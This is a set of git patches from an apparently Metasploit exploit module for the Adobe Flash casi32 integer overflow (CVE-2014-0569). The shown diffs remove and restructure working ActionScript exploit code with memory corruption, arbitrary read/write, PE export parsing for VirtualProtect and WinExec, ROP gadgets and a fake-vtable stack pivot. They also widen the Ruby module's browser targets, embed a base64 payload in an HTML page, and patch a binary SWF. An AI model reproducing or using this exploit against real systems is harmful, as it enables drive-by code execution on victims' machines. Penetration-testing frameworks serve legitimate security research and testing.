-			ov[0].endian = "littleEndian"
-
-			for (i = 1; i < ov.length; i++) {
-				ov[i] = new Vector.<Object>(1014)
-				ov[i][0] = ba
-				ov[i][1] = this
-			}
-			
-			for (i = 0; i < uv.length; i++) {
-				uv[i] = new Vector.<uint>(1014)
-				uv[i][0] = 0x41424344
-			}
-			
-			var stack:Vector.<uint> = new Vector.<uint>(0x6400)
-			var payload_space:Vector.<uint> = new Vector.<uint>(0x6400)
-						
-			for (i = 1; i < ov.length; i++) {
-				ov[i][2] = stack
-				ov[i][3] = payload_space
-			}
-
-			ApplicationDomain.currentDomain.domainMemory = ba;
-			// Make ByteArray length 0 so the casi32 integer overflow 
-			// can be exploited
-			ba.atomicCompareAndSwapLength(1024, 0)
-			
-			var object_vector_pos:uint = search_object_vector()
-			var byte_array_object:uint = read_byte_array(object_vector_pos + 4) - 1
-			var stack_object:uint = read_byte_array(object_vector_pos + 12) - 1
-			var payload_space_object:uint = read_byte_array(object_vector_pos + 16) - 1
-			var main:uint = read_byte_array(object_vector_pos + 8) - 1
-			var uint_vector_pos:uint = search_uint_vector()
-			var object_vector_address:uint = read_byte_array(object_vector_pos - 16) + 12
-			var uint_vector_address:uint = object_vector_address + (uint_vector_pos - object_vector_pos)
-			
-			// Overwrite uint vector length
-			var orig_length:uint = write_byte_array(uint_vector_pos, 0xffffffff)
-			
-			for (i = 0; i < uv.length; i++) {
-				if (uv[i].length > 1024) {
-					uv_index = i
-					uv[i][0] = uint_vector_address
-					break
-				}
-			}
-						
-			var buffer_object:uint = vector_read(byte_array_object + 0x40)
-			var buffer:uint = vector_read(buffer_object + 8)
-			var stack_address:uint = vector_read(stack_object + 0x18)
-			var payload_address:uint = vector_read(payload_space_object + 0x18)
-			var vtable:uint = vector_read(main)
-			
-			// Set the new ByteArray length
-			ba.endian = "littleEndian"
-			ba.length = 0x500000
-			
-			// Overwite the ByteArray data pointer and capacity
-			var ba_array:uint = buffer_object + 8
-			var ba_capacity:uint = buffer_object + 16
-			vector_write(ba_array)
-			vector_write(ba_capacity, 0xffffffff)
-			
-			// restoring the corrupted vector length since we don't need it
-			// anymore
-			byte_write(uv[uv_index][0], orig_length)
-			
-			var flash:uint = base(vtable)
-			var winmm:uint = module("winmm.dll", flash)
-			var kernel32:uint = module("kernel32.dll", winmm)
-			var virtualprotect:uint = procedure("VirtualProtect", kernel32)
-            var winexec:uint = procedure("WinExec", kernel32)
-            var xchgeaxespret:uint = gadget("c394", 0x0000ffff, flash)
-            var xchgeaxesiret:uint = gadget("c396", 0x0000ffff, flash)
-            
-            // Continuation of execution
-            byte_write(buffer + 0x10, "\xb8", false); byte_write(0, vtable, false) // mov eax, vtable
-            byte_write(0, "\xbb", false); byte_write(0, main, false) // mov ebx, main
-            byte_write(0, "\x89\x03", false) // mov [ebx], eax
-            byte_write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret
-
-            // Put the payload (command) in memory
-            byte_write(payload_address + 8, payload, true); // payload
-            
-            // Put the fake vtabe / stack on memory
-            byte_write(stack_address + 0x18070, xchgeaxespret) // Initial gadget (stackpivot); from @hdarwin89 sploits, kept for reliability...
-            byte_write(stack_address + 0x180a4, xchgeaxespret) // Initial gadget (stackpivot); call    dword ptr [eax+0A4h]
-            byte_write(stack_address + 0x18000, xchgeaxesiret) // fake vtable; also address will become stack after stackpivot
-            byte_write(0, virtualprotect)
-
-            // VirtualProtect
-            byte_write(0, winexec)
-            byte_write(0, buffer + 0x10)
-            byte_write(0, 0x1000)
-            byte_write(0, 0x40)
-            byte_write(0, buffer + 0x8) // Writable address (4 bytes)
-
-            // WinExec
-            byte_write(0, buffer + 0x10)
-            byte_write(0, payload_address + 8)
-            byte_write(0)
-
-            byte_write(main, stack_address + 0x18000) // overwrite with fake vtable
-            						
-            toString() // call method in the fake vtable
-		}
-		
-		// Methods to use the integer overflow
-		
-		private function search_object_vector(limit:uint = 0xf9000, pattern:uint = 1014):uint {
-			var mem:uint = 0
-			var mem_first_pos:uint = 0
-			var next_length:uint = 0
-			
-			for (var i:uint = 0; i < limit; i = i + 4) {
-				mem = read_byte_array(i)
-				mem_first_pos = read_byte_array(i + 8)
-				if (mem == pattern && mem_first_pos != 0x41424344) {
-					return i;
-				}
-			}
-			return -1;
-		}
-		
-		private function search_uint_vector(limit:uint = 0xf9000, pattern:uint = 1014):uint {
-			var mem:uint = 0
-			var mem_first_pos:uint = 0
-			
-			for (var i:uint = 0; i < limit; i = i + 4) {
-				mem = read_byte_array(i)
-				mem_first_pos = read_byte_array(i + 8)
-				if (mem == pattern && mem_first_pos == 0x41424344) {
-					return i;
-				}
-			}
-			return -1;
-		}
-						
-		private function read_byte_array(offset:uint = 0):uint {
-			var old:uint = casi32(offset, 0xdeedbeef, 0xdeedbeef)
-			return old
-		}
-		
-		private function write_byte_array(offset:uint = 0, value:uint = 0):uint {
-			var old:uint = read_byte_array(offset)
-			casi32(offset, old, value)
-			return old
-		}
-		
-		// Methods to use the corrupted vector for arbitrary reading/writing
-		
-		private function vector_write(addr:uint, value:uint = 0):void
-		{
-			addr > uv[uv_index][0] ? uv[uv_index][(addr - uv[uv_index][0]) / 4 - 2] = value : uv[uv_index][0xffffffff - (uv[uv_index][0] - addr) / 4 - 1] = value
-		}
-
-		private function vector_read(addr:uint):uint
-		{
-			return addr > uv[uv_index][0] ? uv[uv_index][(addr - uv[uv_index][0]) / 4 - 2] : uv[uv_index][0xffffffff - (uv[uv_index][0] - addr) / 4 - 1]
-		}
-
-		// Methods to use the corrupted byte array for arbitrary reading/writing
-		
-		private function byte_write(addr:uint, value:* = 0, zero:Boolean = true):void
-		{
-			if (addr) ba.position = addr
-			if (value is String) {
-				for (var i:uint; i < value.length; i++) ba.writeByte(value.charCodeAt(i))
-				if (zero) ba.writeByte(0)
-			} else ba.writeUnsignedInt(value)
-		}
-
-		private function byte_read(addr:uint, type:String = "dword"):uint
-		{
-			ba.position = addr
-			switch(type) {
-				case "dword":
-					return ba.readUnsignedInt()
-				case "word":
-					return ba.readUnsignedShort()
-				case "byte":
-					return ba.readUnsignedByte()
-			}
-			return 0
-		}
-		
-		// Methods to search the memory with the corrupted byte array
-		
-		private function base(addr:uint):uint
-		{
-			addr &= 0xffff0000
-			while (true) {
-				if (byte_read(addr) == 0x00905a4d) return addr
-				addr -= 0x10000
-			}
-			return 0
-		}
-
-		private function module(name:String, addr:uint):uint
-		{
-			var iat:uint = addr + byte_read(addr + byte_read(addr + 0x3c) + 0x80) 
-			var i:int = -1
-			while (true) {
-				var entry:uint = byte_read(iat + (++i) * 0x14 + 12)
-				if (!entry) throw new Error("FAIL!");
-				ba.position = addr + entry
-				var dll_name:String = ba.readUTFBytes(name.length).toUpperCase();
-				if (dll_name == name.toUpperCase()) {
-					break;
-				}
-			}
-			return base(byte_read(addr + byte_read(iat + i * 0x14 + 16)));
-		}
-
-		private function procedure(name:String, addr:uint):uint
-		{
-			var eat:uint = addr + byte_read(addr + byte_read(addr + 0x3c) + 0x78)
-			var numberOfNames:uint = byte_read(eat + 0x18)
-			var addressOfFunctions:uint = addr + byte_read(eat + 0x1c)
-			var addressOfNames:uint = addr + byte_read(eat + 0x20)
-			var addressOfNameOrdinals:uint = addr + byte_read(eat + 0x24)
-			
-			for (var i:uint = 0; ; i++) {
-				var entry:uint = byte_read(addressOfNames + i * 4)
-				ba.position = addr + entry
-				if (ba.readUTFBytes(name.length+2).toUpperCase() == name.toUpperCase()) break
-			}
-			return addr + byte_read(addressOfFunctions + byte_read(addressOfNameOrdinals + i * 2, "word") * 4)
-		}
-
-		private function gadget(gadget:String, hint:uint, addr:uint):uint
-		{
-			var find:uint = 0
-			var limit:uint = byte_read(addr + byte_read(addr + 0x3c) + 0x50)
-			var value:uint = parseInt(gadget, 16)
-			for (var i:uint = 0; i < limit - 4; i++) if (value == (byte_read(addr + i) & hint)) break
-			return addr + i
-		}
-	}
-}
diff --git a/external/source/exploits/CVE-2014-0569/PE.as b/external/source/exploits/CVE-2014-0569/PE.as
new file mode 100755
index 0000000000..8753586477
--- /dev/null
+++ b/external/source/exploits/CVE-2014-0569/PE.as
@@ -0,0 +1,72 @@
+package
+{
+    public class PE
+    {
+        private var eba:ExploitByteArray
+
+        public function PE(ba:ExploitByteArray)
+        {
+            eba = ba
+        }
+
+        public function base(addr:uint):uint
+        {
+            addr &= 0xffff0000
+            while (true) {
+                if (eba.read(addr) == 0x00905a4d) return addr
+                addr -= 0x10000
+            }
+            return 0
+        }
+
+        public function module(name:String, addr:uint):uint
+        {
+            var iat:uint = addr + eba.read(addr + eba.read(addr + 0x3c) + 0x80), i:int = -1
+            var mod_name:String
+
+            while (true) {
+                var entry:uint = eba.read(iat + (++i) * 0x14 + 12)
+                if (!entry) throw new Error("FAIL!"); 
+                mod_name = eba.read_string(addr + entry, name.length)
+                if (mod_name.toUpperCase() == name.toUpperCase()) break
+            }
+            return base(eba.read(addr + eba.read(iat + i * 0x14 + 16)))
+        }
+
+        public function procedure(name:String, addr:uint):uint
+        {
+            var eat:uint = addr + eba.read(addr + eba.read(addr + 0x3c) + 0x78)
+            var numberOfNames:uint = eba.read(eat + 0x18)
+            var addressOfFunctions:uint = addr + eba.read(eat + 0x1c)
+            var addressOfNames:uint = addr + eba.read(eat + 0x20)
+            var addressOfNameOrdinals:uint = addr + eba.read(eat + 0x24)
+            var proc_name:String
+
+            for (var i:uint = 0; ; i++) {
+                var entry:uint = eba.read(addressOfNames + i * 4)
+                proc_name = eba.read_string(addr + entry, name.length + 2)
+                if (proc_name.toUpperCase() == name.toUpperCase()) break
+            }
+            return addr + eba.read(addressOfFunctions + eba.read(addressOfNameOrdinals + i * 2, "word") * 4)
+        }
+
+        public function gadget(gadget:String, hint:uint, addr:uint):uint
+        {
+            var find:uint = 0
+            var contents:uint = 0
+            var limit:uint = eba.read(addr + eba.read(addr + 0x3c) + 0x50)
+            var value:uint = parseInt(gadget, 16)
+
+            for (var i:uint = 0; i < limit - 4; i++) {
+                contents = eba.read(addr + i)
+                if (hint == 0xffffffff && value == contents) {
+                    return addr + i
+                }
+                if (hint != 0xffffffff && value == (contents & hint)) {
+                    return addr + i
+                }
+            }
+            throw new Error()
+        }
+    }
+}
diff --git a/modules/exploits/windows/browser/adobe_flash_casi32_int_overflow.rb b/modules/exploits/windows/browser/adobe_flash_casi32_int_overflow.rb
index 6ea97614c8..57bc88f9aa 100644
--- a/modules/exploits/windows/browser/adobe_flash_casi32_int_overflow.rb
+++ b/modules/exploits/windows/browser/adobe_flash_casi32_int_overflow.rb
@@ -6,9 +6,8 @@
 require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
-  Rank = NormalRanking
+  Rank = GreatRanking
 
-  include Msf::Exploit::Powershell
   include Msf::Exploit::Remote::BrowserExploitServer
 
   def initialize(info={})
@@ -39,12 +38,16 @@ class Metasploit3 < Msf::Exploit::Remote
           'DisableNops' => true
         },
       'Platform'            => 'win',
+      'Arch'                => ARCH_X86,
       'BrowserRequirements' =>
         {
           :source  => /script|headers/i,
-          :os_name => OperatingSystems::Match::WINDOWS_7,
-          :ua_name => Msf::HttpClients::IE,
-          :flash   => lambda { |ver| ver =~ /^15\./ && ver == '15.0.0.167' },
+          :os_name => lambda do |os|
+            os =~ OperatingSystems::Match::WINDOWS_7 ||
+              os =~ OperatingSystems::Match::WINDOWS_81
+          end,
+          :ua_name => lambda { |ua| [Msf::HttpClients::IE, Msf::HttpClients::FF].include?(ua) },
+          :flash   => lambda { |ver| ver =~ /^15\./ && Gem::Version.new(ver) <=  Gem::Version.new('15.0.0.167') },
           :arch    => ARCH_X86
         },
       'Targets'             =>
@@ -77,17 +80,18 @@ class Metasploit3 < Msf::Exploit::Remote
   def exploit_template(cli, target_info)
     swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
     target_payload = get_payload(cli, target_info)
-    psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})
-    b64_payload = Rex::Text.encode_base64(psh_payload)
+    b64_payload = Rex::Text.encode_base64(target_payload)
+    platform_id = 'win'
+    os_name = target_info[:os_name]
 
     html_template = %Q|<html>
     <body>
     <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
     <param name="movie" value="<%=swf_random%>" />
     <param name="allowScriptAccess" value="always" />
-    <param name="FlashVars" value="sh=<%=b64_payload%>" />
+    <param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" />
     <param name="Play" value="true" />
-    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>" Play="true"/>
+    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/>
     </object>
     </body>
     </html>

From 39851d277ddb012be5c04ad5e7af412fd5e3b529 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Tue, 9 Jun 2015 11:36:09 -0500
Subject: [PATCH 0362/1013] Unset debug flag

---
 data/exploits/CVE-2014-0569/msf.swf           | Bin 20782 -> 20782 bytes
 .../source/exploits/CVE-2014-0569/Exploit.as  |   4 ++--
 .../source/exploits/CVE-2014-0569/Logger.as   |   2 +-
 3 files changed, 3 insertions(+), 3 deletions(-)

diff --git a/data/exploits/CVE-2014-0569/msf.swf b/data/exploits/CVE-2014-0569/msf.swf
index f771382e56e7adaccc4f73f87bb01c34e97dedd0..79e5b8f472276790bb1d87f9b73a7b45900127e5 100755
GIT binary patch
delta 20658
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
